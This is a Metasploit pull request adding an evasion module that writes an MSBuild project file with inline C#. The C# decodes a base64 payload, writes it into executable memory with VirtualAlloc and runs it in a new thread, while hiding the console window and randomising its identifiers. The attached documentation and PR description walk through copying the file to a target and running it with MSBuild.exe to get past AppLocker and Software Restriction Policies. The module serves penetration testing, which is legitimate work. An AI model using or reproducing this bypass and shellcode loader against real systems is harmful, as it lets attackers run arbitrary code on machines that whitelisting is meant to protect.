### PR TITLE
Add evasion module applocker_evasion_msbuild

### DIFF
--- a/documentation/modules/evasion/windows/applocker_evasion_msbuild.md
+++ b/documentation/modules/evasion/windows/applocker_evasion_msbuild.md
@@ -1,0 +1,29 @@
+## Intro
+
+This module is designed to evade solutions such as software restriction policies and Applocker.
+Applocker in its default configuration will block code in the form of executables (.exe and .com, .msi), scripts (.ps1, .vbs, .js) and dll's from running in user controlled directories.
+Applocker enforces this by employing whitelisting, in that code can only be run from the protected directories and sub directories of "Program Files" and "Windows"
+The main vector for this bypass is to use the trusted binary MSBuild.exe to execute user supplied code as this binary is located within the trusted Windows directory.
+
+## Vulnerable Application
+
+This evasion will work on all versions of Windows that include .NET versions 3.5 or greater that has solutions such as Applocker or Software Restriction Policies active, that do not explicitly block MSBuild.exe or the "Microsoft.Net" directory.
+
+## Options
+
+- **FILENAME** - Filename for the evasive file (default: msbuild.txt).
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use evasion/windows/applocker_evasion_msbuild`
+  3. Do: `set PAYLOAD <payload>`
+  4. Do: `run`
+  5. The module will now display instructions of how to proceed
+  6. `[+] msbuild.txt stored at /root/.msf4/local/msbuild.txt`
+  7. `[*] Copy msbuild.txt to the target`
+  8. `[*] Execute using: C:\Windows\Microsoft.Net\Framework64\[.NET Version]\MSBuild.exe msbuild.txt` replace [.NET Version] with the version directory present on the target (typically "v4.0.30319").
+
+## References
+
+https://attack.mitre.org/techniques/T1127/

--- a/modules/evasion/windows/applocker_evasion_msbuild.rb
+++ b/modules/evasion/windows/applocker_evasion_msbuild.rb
@@ -5,28 +5,25 @@
 
 class MetasploitModule < Msf::Evasion
 
-  def initialize(info={})
-    super(
-      update_info(
-        info,
-          'Name'        => 'Applocker Evasion - MSBuild',
-          'Description' => %(
-                             This module will assist you in evading Microsoft
-                             Windows Applocker and Software Restriction Policies.
-                             This technique utilises the Microsoft signed binary
-                             MSBuild.exe to execute user supplied code.
-                            ),
-          'Author'      =>
-            [
-              'Nick Tyrer <@NickTyrer>', # module development
-              'Casey Smith' # msbuild bypass research
-            ],
-          'License'     => 'MSF_LICENSE',
-          'Platform'    => 'win',
-          'Arch'        => [ARCH_X86, ARCH_X64],
-          'Targets'     => [['Microsoft Windows', {}]],
-          'References'  => [['URL', 'https://attack.mitre.org/techniques/T1127/']]
-      )
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Applocker Evasion - MSBuild',
+      'Description' => %(
+                         This module will assist you in evading Microsoft
+                         Windows Applocker and Software Restriction Policies.
+                         This technique utilises the Microsoft signed binary
+                         MSBuild.exe to execute user supplied code.
+                        ),
+      'Author'      =>
+        [
+          'Nick Tyrer <@NickTyrer>', # module development
+          'Casey Smith' # msbuild bypass research
+        ],
+      'License'     => 'MSF_LICENSE',
+      'Platform'    => 'win',
+      'Arch'        => [ARCH_X86, ARCH_X64],
+      'Targets'     => [['Microsoft Windows', {}]],
+      'References'  => [['URL', 'https://attack.mitre.org/techniques/T1127/']])
     )
 
     register_options(

--- a/modules/evasion/windows/applocker_evasion_msbuild.rb
+++ b/modules/evasion/windows/applocker_evasion_msbuild.rb
@@ -1,0 +1,118 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Evasion
+
+  def initialize(info={})
+    super(
+      update_info(
+        info,
+          'Name'        => 'Applocker Evasion - MSBuild',
+          'Description' => %(
+                             This module will assist you in evading Microsoft
+                             Windows Applocker and Software Restriction Policies.
+                             This technique utilises the Microsoft signed binary
+                             MSBuild.exe to execute user supplied code.
+                            ),
+          'Author'      =>
+            [
+              'Nick Tyrer <@NickTyrer>', # module development
+              'Casey Smith' # msbuild bypass research
+            ],
+          'License'     => 'MSF_LICENSE',
+          'Platform'    => 'win',
+          'Arch'        => [ARCH_X86, ARCH_X64],
+          'Targets'     => [['Microsoft Windows', {}]],
+          'References'  => [['URL', 'https://attack.mitre.org/techniques/T1127/']]
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('FILENAME', [true, 'Filename for the evasive file (default: msbuild.txt)', 'msbuild.txt'])
+      ]
+    )
+  end
+
+  def build_payload
+    Rex::Text.encode_base64(payload.encoded)
+  end
+
+  def instructions
+    print_status "Copy #{datastore['FILENAME']} to the target"
+    if payload.arch.first == ARCH_X86
+      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\MSBuild.exe #{datastore['FILENAME']}"
+    else
+      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\MSBuild.exe #{datastore['FILENAME']}"
+    end
+  end
+
+  def obfu
+    Rex::Text.rand_text_alpha 8
+  end
+
+  def msbuild
+    esc = build_payload
+    mod = [obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu, obfu]
+    <<~HEREDOC
+      <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+      <Target Name="#{mod[0]}">
+      <#{mod[1]} />
+      </Target>
+      <UsingTask
+      TaskName="#{mod[1]}"
+      TaskFactory="CodeTaskFactory"
+      AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll" >
+      <Task>
+      <Code Type="Class" Language="cs">
+      <![CDATA[
+      using System;
+      using System.Runtime.InteropServices;
+      using Microsoft.Build.Framework;
+      using Microsoft.Build.Utilities;
+      public class #{mod[1]} :  Task, ITask
+      {
+      private static Int32 #{mod[2]}=0x1000;
+      private static IntPtr #{mod[3]}=(IntPtr)0x40;
+      private static UInt32 #{mod[4]} = 0xFFFFFFFF;
+      [System.Runtime.InteropServices.DllImport("kernel32")]
+      private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
+      [System.Runtime.InteropServices.DllImport("kernel32")]
+      private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
+      [System.Runtime.InteropServices.DllImport("kernel32")]
+      private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
+      [System.Runtime.InteropServices.DllImport("user32.dll")]
+      static extern bool ShowWindow(IntPtr #{mod[5]}, int nCmdShow);
+      [System.Runtime.InteropServices.DllImport("Kernel32")]
+      private static extern IntPtr GetConsoleWindow();
+      const int #{mod[6]} = 0;
+      public override bool Execute()
+      {
+      IntPtr #{mod[5]};
+      #{mod[5]} = GetConsoleWindow();
+      ShowWindow(#{mod[5]}, #{mod[6]});
+      string #{mod[7]} = "#{esc}";
+      byte[] #{mod[8]} = Convert.FromBase64String(#{mod[7]});
+      byte[] #{mod[9]} = #{mod[8]};
+      IntPtr #{mod[10]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[9]}.Length, #{mod[2]}, #{mod[3]});
+      System.Runtime.InteropServices.Marshal.Copy(#{mod[9]}, 0, #{mod[10]}, #{mod[9]}.Length);
+      IntPtr #{mod[11]} = IntPtr.Zero;
+      WaitForSingleObject(CreateThread(#{mod[11]}, UIntPtr.Zero, #{mod[10]}, #{mod[11]}, 0, ref #{mod[11]}), #{mod[4]});
+      return true;
+      }
+      }
+      ]]>
+      </Code>
+      </Task>
+      </UsingTask>
+      </Project>
+    HEREDOC
+  end
+
+  def run
+    file_create(msbuild)
+    instructions
+  end
+end

--- a/modules/evasion/windows/applocker_evasion_msbuild.rb
+++ b/modules/evasion/windows/applocker_evasion_msbuild.rb
@@ -37,15 +37,6 @@ class MetasploitModule < Msf::Evasion
     Rex::Text.encode_base64(payload.encoded)
   end
 
-  def instructions
-    print_status "Copy #{datastore['FILENAME']} to the target"
-    if payload.arch.first == ARCH_X86
-      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\MSBuild.exe #{datastore['FILENAME']}"
-    else
-      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\MSBuild.exe #{datastore['FILENAME']}"
-    end
-  end
-
   def obfu
     Rex::Text.rand_text_alpha 8
   end
@@ -108,8 +99,29 @@ class MetasploitModule < Msf::Evasion
     HEREDOC
   end
 
+  def file_format_filename(name = '')
+    name.empty? ? @fname : @fname = name
+  end
+
+  def create_files
+    f1 = datastore['FILENAME'].empty? ? 'msbuild.txt' : datastore['FILENAME']
+    f1 << '.txt' unless f1.downcase.end_with?('.txt')
+    file1 = msbuild
+    file_format_filename(f1)
+    file_create(file1)
+  end
+
+  def instructions
+    print_status "Copy #{datastore['FILENAME']} to the target"
+    if payload.arch.first == ARCH_X86
+      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework\\[.NET Version]\\MSBuild.exe #{datastore['FILENAME']}"
+    else
+      print_status "Execute using: C:\\Windows\\Microsoft.Net\\Framework64\\[.NET Version]\\MSBuild.exe #{datastore['FILENAME']}"
+    end
+  end
+
   def run
-    file_create(msbuild)
+    create_files
     instructions
   end
 end


### PR DESCRIPTION
## Intro

This module is designed to evade solutions such as software restriction policies and Applocker.
The main vector for this bypass is to use the trusted binary MSBuild.exe in executing user supplied code.

This pull request is in reference to the previous pull request #8783.

## Vulnerable Application

This evasion will work on all versions of Windows that include .net versions 3.5 or greater (note: ensure the selected payload matches the target os architecture).


## Verification Steps

1. Enable Applocker and enable executable rules
2. Verify a standard .exe will not run from the users desktop
3. Do ` use evasion/windows/applocker_evasion_msbuild`
4. Do `exploit`
5. Follow the onscreen instructions by copying the created file to the targets desktop
6. Verify that code execution is achieved.